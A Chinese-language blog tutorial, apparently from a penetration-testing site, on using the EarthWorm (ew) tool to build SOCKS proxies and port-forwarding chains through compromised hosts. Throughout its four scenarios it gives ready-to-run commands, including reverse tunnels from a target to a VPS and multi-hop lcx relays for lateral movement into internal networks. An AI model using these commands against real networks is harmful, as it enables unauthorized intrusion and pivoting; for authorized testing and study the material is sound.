支持平台(可以跨平台反弹)

1. ew_for_Win.exe 适用各种Windows系统(X86指令集、X64指令集) Windows7、Windows XP
2. ew_for_Linux32 各常见Linux发行版 (X86 指令集 CPU) Ubuntu(X86)/BT5(X86)
3. ew_for_linux64 各常见Linux发行版 (X64 指令集 CPU) Ubuntu(X64)/Kali(X64)
4. ew_for_MacOSX64 MacOS系统发行版 (X64 指令集) 苹果PC电脑，苹果server
5. ew_for_Arm32 常见Arm-Linux系统 HTC New One(Arm-Android)/小米路由器(R1D)
6. ew_mipsel 常见Mips-Linux系统 (Mipsel指令集 CPU) 萤石硬盘录像机、小米mini路由器(R1CM）

参数说明

-l listenport open a port for the service startup. // 为服务启动打开一个端口。

-d refhost
set the reflection host address. // 设置反连主机地址。

-e refport
set the reflection port. // 设置反连端口。

-f connhost
set the connect host address . // 设置连接主机地址。

-g connport
set the connect port. // 设置连接端口。

-t usectime
set the milliseconds for timeout. The default value is 1000
// 设置超时的毫秒数。默认值值为1000
-s state s
etup the function. // 状态设置功能。

功能有
ssocksd 开启正向socks服务

rcsocks（VPS） rssocks（靶机） 用于反向连接

lcx_slave 控制管道（把反弹的流量转发到直连的服务器上）：一侧通过反弹方式连接代理请求方，另一侧连接代理提供主机

lcx_tran转发管道（把直连的流量转发到直连的服务器上）：通过监听本地端口接收代理请求，并转交给代理提供主机。

lcx_listen监听管道（把直连的流量转发到反弹的服务器上）：通过监听本地端口接收数据，并将其转交给目标网络回连的代理提供主机。
通过组合lcx类的特性，可以实现多层内网下的环境渗透

环境一：

靶机是边界机，可以任意开监听端口

1. 靶机直接运行

   ./ew -s ssocksd -l 8888
   //在靶机上开启8888的socks代理的监听端口
   

2. 攻击机可以直接配置proxychains 1.1.1.1 8888,进行转发

环境二：

目标在内网，没有公网ip，但是可以ping通公网ip，需要用反弹的方式来做代理（属于端口映射，访问VPS的1080的端口相当于访问A的8888端口）
需要一个公网VPS来做监听

1. VPS上运行

    ./ew_linux_x64 -s rcsocks -l 9998 -e 9999 &
   

注意 rcsocks是在服务端开启，-l表示监听9998流量， -e 设置的就是将流量通过9999交互传递

1. 靶机上运行

./ew_linux_x64 -s rssocks -d 39.108.191.21 -e 9999

注意是rssocks
-d表示反连的主机，-e 反连的端口

这个时候服务端可以发现连接成功，转发已经成功，vps的流量会到靶机上，靶机也是如此

1. 配置proxychains代理

   sudo vi /etc/proxychains4.conf

9998端口相当于服务端的服务端口

配置完成后，就可以进行代理了。我们在本地开启过一个http的服务，这个时候我们的用上代理工具就相当于攻击机已经处于内网环境，访问一下本地的web

成功

环境三：

A是边界机可被外网访问，B是内网机但不可以访问外网，B可以访问C，A不可以

A可以直连B，kali直连A，现目标kali连B（相当于端口转发，把A的流量转发到B上）

完整的渗透流程：

1. A开直连，先让kali能和A在同一网段下，通过A以后发现B，攻击B

   ./ew -s ssocksd -l 8888
   // 在 2.2.2.2主机上利用 ssocksd 方式启动 8888 端口的 socks 代理
   

2. B开直连（B被拿下，现目标让kali直接连B），因为A可以直接访问B

   ./ew -s ssocksd -l 9999
   

3. A开启端口转发，

   ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
   // A的1080端口作为代理的服务端口，9999是去连接B开启的9999端口
   //此时访问A的1080就是访问B的9999
   

4. 攻击机配置proxychains 2.2.2.2 1080即可连接到B的9999上

环境四：

A内网机可以出网（没有公网ip），B内网机不可以出网，只有B可以访问C
A可以直连B，A访问VPS（A、B已经拿下）

|HackTools| ->> | 1080 -> 1.1.1.1 -> 8888 | 防火墙 | <-- 2.2.2.2 --> | ->> | 9999 -> 2.2.2.3 |
A做端口映射（因为A无公网ip），A再做端口转发（只有A能访问B）

1. VPS运行

   ./ew -s lcx_listen -l 1080 -e 8888
   // 在VPS 公网主机添加转接隧道，将 1080 收到的代理请求转交给反连 8888 端口的主机
   

2. B上开直连

   ./ew -s ssocksd -l 9999
   // 在B主机上利用 ssocksd 方式启动 9999 端口的 socks 代理
   

3. 在A上开直连B并且把反弹流量到VPS上

   ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
   // 在 A上，通过工具的 lcx_slave 方式，打通VPS:8888 和C:9999 之间的通讯隧道
   

文中参考：
https://www.freebuf.com/sectool/259634.html

本文作者：硝基苯
本文链接：https://www.c6sec.com/index.php/archives/173/
最后修改时间：2021-05-03 20:24:37
本站未注明转载的文章均为原创，并采用 CC BY-NC-SA 4.0 授权协议，转载请注明来源，谢谢！